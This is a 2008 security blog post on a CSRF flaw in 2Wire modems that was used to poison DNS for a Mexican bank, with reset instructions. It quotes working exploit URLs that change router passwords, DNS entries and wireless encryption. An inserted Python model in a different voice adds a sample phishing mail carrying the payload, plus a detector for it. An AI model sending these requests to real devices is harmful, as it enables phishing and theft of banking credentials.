Wiz's Computer and Website Security Blog

Wiz Feinberg

Our blog deals with computer troubleshooting, vulnerability alerts, computer security, spyware & virus removal tools, e-mail threats, spam filters and website security issues.


Hackers exploit vulnerability in 2Wire modems to steal Mexican bank accounts

In a recent security alert, carried on several high-profile security websites, it was revealed that attackers, location unknown, are exploiting a vulnerability in certain models of the 2Wire brand of DSL modem/routers to steal online banking credentials, so far only in Mexico. The same modems are in use in the US, so don't get smug about this happening in Mexico only; the Mexican campaign may well be a test run before the same technique is turned against US-based modems.

The attack begins with a spammed email. The message body contains an HTML image tag whose source is not a picture at all but a request to the modem's configuration interface at its default LAN address; when the mail client renders the image, it sends that request to the modem on the victim's own network. The message also carries a link to a supposed video, where a second piece of malware (named TROJ_QHOST.FX in the Trend Micro alert listed under Sources) tries to install itself. People who don't have the targeted modem are not affected directly by the hidden request, this time. People who do have one of these modems, and who have never set a personal administrator password on it, will have the request accepted without any authentication. The request adds a DNS entry for banamex.com, the largest bank in Mexico, that points to a look-alike phishing website. From then on every request for banamex.com from behind that modem is silently redirected to the fake site, where the login credentials people enter are added to the database owned by the criminals behind this exploit. Those accounts will be emptied unless the victims realize they've been duped before the thieves get to their money, which is not likely.

Because the poisoned DNS entry lives in the modem itself, typing banamex.com, the bank's legitimate fully-qualified domain name, into the address bar leads to the fraudulent site all the same; there is no misspelled link to spot. This is the same kind of redirection that occurs when spyware poisons a computer's HOSTS file to send specific names to a hostile address, with one important difference: a HOSTS file affects one computer, whereas the modem answers for every device on the network that uses it as its DNS server. The exploit occurs invisibly for users of the affected modems who have not changed the default administrator password, which is null (none set). If a personal password has been created, the exploit fails. About 2 million of the affected modems have been shipped to customers in Mexico, all without an administrator password set; it is left to the recipients to create one.

This is a known vulnerability, unpatched at the time of writing, that was first reported on August 17, 2007. It is catalogued as CVE-2007-4387, a cross-site request forgery (CSRF) in the "xslt" configuration page, and affects 2Wire modem/router models 1701HG, 1800HW and 2071 running software versions 3.17.5, 3.7.1 and 5.29.51. It allows remote attackers to create DNS mappings with administrator rights, and so conduct DNS poisoning attacks, via the NAME and ADDR parameters of that page, without any authentication when no administrator password exists. That demonstrates the importance of changing the default modem password to one that is not easily guessed. Two caveats: a password set now prevents new unauthenticated changes but does not remove a mapping an attacker has already added (see the Solution below), and one of the changes an attacker can make through the same hole is to set a password of his own, locking the legitimate owner out. If you have one of these modems and have not already created a strong administrator password, do so as soon as possible!


Summary of the vulnerability, as described in the advisories listed under Sources:

Background
-------------
This is the most popular router in Mexico and the default installation from the ISP has no system password.

Vulnerability
----------------
It is possible to send a request to the router that will modify its configuration.

It does not validate the request method (POST), the Referer header, or anything else, unless the administrator password has been set by the customer.

Exploit
----------------
The client PC sends a request to the router containing the configuration changes, and they are applied instantly.

Examples:

Set a password (NewPassword):
http://192.168.1.254/xslt?PAGE=A05_POST&THISPAGE=A05&NEXTPAGE=A05_POST&ENABLE_PASS=on&PASSWORD=NewPassword&PASSWORD_CONF=NewPassword

Add a name to the DNS table (map www.example.com to 172.16.32.64):
http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.example.com&ADDR=172.16.32.64

Disable wireless encryption:
http://192.168.1.254/xslt?PAGE=C05_POST&THISPAGE=C05&NEXTPAGE=C05_POST&NAME=encrypt_enabled&VALUE=0

Set dynamic DNS:
http://192.168.1.254/xslt?PAGE=J05_POST&THISPAGE=J05&NEXTPAGE=J05_POST&IP_DYNAMIC=TRUE

The same mechanism can also disable the firewall, reset the device, and so on.
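As an added example, not code from this post or from 2Wire, the following Python script models the behaviour described in the paragraphs above and in the Exploit section: a toy gateway whose /xslt handler applies the J38_SET (DNS mapping) and A05_POST (password) requests without any check while no administrator password exists, the same gateway once a password has been set, and a hardened variant of the kind a practitioner would want (no configuration changes before initial setup, plus a per-session anti-CSRF token carried in the request). It also includes a small scanner that pulls auto-loaded src= URLs out of an HTML mail body and flags the ones aimed at a LAN gateway, which is the image-tag trick the spam relies on. The 192.168.1.254 address, the gateway.2wire.net name and the page/parameter names come from the post; the sample mail, the phishing address 203.0.113.5, the video.example.net host and the TOKEN parameter are constructed for this example.

```python
"""Added example, not code from the post or from 2Wire: a toy model of the
2Wire /xslt configuration handler (as shipped, and hardened) plus a scanner
for the image-tag payload in the spam. Hosts, tokens and mail: constructed."""
import secrets
from html.parser import HTMLParser
from ipaddress import ip_address, ip_network
from urllib.parse import parse_qs, urlparse

GATEWAY_HOSTS = {"192.168.1.254", "gateway.2wire.net"}   # defaults named in the post
LAN_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


class Gateway:
    """Hypothetical model of how the gateway treats a GET to /xslt."""

    def __init__(self, admin_password=None, hardened=False):
        self.admin_password = admin_password        # None == shipped default
        self.hardened = hardened
        self.session_token = secrets.token_hex(16)  # what a real login would issue
        self.dns = {}                                # J38 "Add names to DNS" table

    def handle(self, url, session_token=None):
        """Apply one request; returns (accepted, reason). session_token stands
        in for the session cookie a browser would attach automatically."""
        u = urlparse(url)
        if u.hostname not in GATEWAY_HOSTS or u.path != "/xslt":
            return False, "not the configuration endpoint"
        q = {k: v[0] for k, v in parse_qs(u.query).items()}
        # As shipped: nothing is checked until the customer sets a password,
        # so a request fired by an <img> tag is honoured like any other.
        if self.admin_password is not None and session_token != self.session_token:
            return False, "login required"
        if self.hardened:
            # Hardening added here (not 2Wire's fix): no state change before
            # initial setup, and every change must carry a per-session
            # anti-CSRF token that a third-party page or mail cannot know.
            if self.admin_password is None:
                return False, "complete initial setup (set a password) first"
            if q.get("TOKEN") != self.session_token:
                return False, "missing or wrong anti-CSRF token"
        if q.get("PAGE") == "J38_SET" and "NAME" in q and "ADDR" in q:
            self.dns[q["NAME"].lower()] = q["ADDR"]
            return True, f"DNS mapping added: {q['NAME']} -> {q['ADDR']}"
        if q.get("PAGE") == "A05_POST" and q.get("PASSWORD") and q["PASSWORD"] == q.get("PASSWORD_CONF"):
            self.admin_password = q["PASSWORD"]      # the lock-out change
            return True, "admin password set"
        return False, "unrecognised page"


class _SrcCollector(HTMLParser):
    """Collects src= URLs of tags a mail client may fetch without a click."""

    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        if tag in ("img", "iframe", "script"):
            self.urls += [v for k, v in attrs if k == "src" and v]


def _targets_lan(host):
    """True for the gateway's own names or any RFC 1918 address."""
    if host.lower() in GATEWAY_HOSTS:
        return True
    try:
        addr = ip_address(host)
    except ValueError:
        return False                 # a public host name, not a LAN device
    return any(addr in net for net in LAN_NETS)


def find_lan_csrf(html):
    """Auto-loaded URLs in an HTML mail body that carry a query string to a
    LAN device: the CSRF-by-image pattern described in the post."""
    parser = _SrcCollector()
    parser.feed(html)
    hits = []
    for url in parser.urls:
        p = urlparse(url)
        if p.scheme in ("http", "https") and p.hostname and p.query and _targets_lan(p.hostname):
            hits.append(url)
    return hits


# Constructed sample of the kind of message described above (not a real one).
SAMPLE_MAIL = """<html><body>
<p>Mira este video!</p> <a href="http://video.example.net/watch.exe">Ver video</a>
<img src="http://192.168.1.254/xslt?PAGE=J38_SET&amp;THISPAGE=J38&amp;NEXTPAGE=J38_SET&amp;NAME=www.banamex.com&amp;ADDR=203.0.113.5" width="1" height="1">
<img src="http://video.example.net/logo.gif">
</body></html>"""


def demo():
    """Run the sample mail's payload against the three gateway states."""
    payload = find_lan_csrf(SAMPLE_MAIL)[0]
    shipped = Gateway()                                        # no password set
    with_pw = Gateway(admin_password="not-the-default")
    hardened = Gateway(admin_password="not-the-default", hardened=True)
    return {
        "shipped": shipped.handle(payload),
        "shipped_dns": dict(shipped.dns),
        "password_set": with_pw.handle(payload),
        "password_set_but_logged_in": with_pw.handle(payload, with_pw.session_token),
        "hardened_logged_in": hardened.handle(payload, hardened.session_token),
    }


if __name__ == "__main__":
    for state, result in demo().items():
        print(f"{state:28} {result}")
```

Running it shows the shipped gateway accepting the mapping, the password-protected one refusing with "login required", and the hardened one refusing even a logged-in request because the mail's URL cannot carry the token. The session token in the model stands in for a session cookie: a mail client rendering an image has none, but a browser that also has the administration page open would send it automatically, which is why the hardened variant insists on a token inside the request rather than on the password alone.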

Solution
----------------
To undo the redirect to the phishing website you must reset your 2Wire modem to its factory default state. Warning: this will wipe out all saved rules and your login credentials! Have your DSL user name and password ready to enter into the modem after you reset it, or you will not be able to get back onto the Internet.

If your modem has a small hole with a recessed reset button on the back or bottom, insert a paper clip or ballpoint pen into the hole, push it against the button and hold it in for about 2 minutes with the power on. After two minutes let go of the button, wait about ten seconds, then unplug the power to the modem for another two minutes. Plug it back in and let it stabilize. You will have to enter your login credentials to get logged onto the DSL service. To do so, open your browser and go to http://gateway.2wire.net/ . If there is no other router between the modem and your computer, you can also reach it at http://192.168.1.254 and enter your login credentials there.

If your modem does not have a reset button you can reset it from its web interface. Open your web browser and type http://gateway.2wire.net/management or http://192.168.1.254/mdc into the address bar. On that page you can create an administrator password and reset the modem to its default state (under Troubleshooting, click RESET TO FACTORY SETTINGS).

After you reset the modem to factory settings and enter your login credentials, log back onto the management page and click "Run Setup Wizard", where you can create a strong administrator password and disable unnecessary features, such as remote administration, to keep this type of exploit from repeating itself.

Sources:
----------------
http://www.securityfocus.com/archive/1/archive/1/476595/100/0/threaded

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4387

http://xforce.iss.net/xforce/xfdb/36044

http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4389

http://blog.trendmicro.com/targeted-attack-in-mexico-dns-poisoning-via-modems/

Posted by Wiz on January 13, 2008 1:51 PM | Permalink

This weblog is licensed under a Creative Commons License.
The content on this blog may be reprinted provided you do not modify the content and that you give credit to Wizcrafts and provide a link back to the blog home page, or individual blog articles you wish to reprint. Commercial use, or derivative work requires written permission from the author.


About the author
Wiz's Blog is written by Bob "Wiz" Feinberg, an experienced freelance computer consultant, troubleshooter and webmaster. Wiz's specialty is computer and website security and combating spam. Wizcrafts Computer Services was established in 1996.

The Wizcrafts Computer Services website and blog are written and maintained by Wiz Feinberg, who is solely responsible for their content.

All articles, text, and non-advertising images on this website are the property of Wizcrafts Computer Services, ©2000 - 2023.
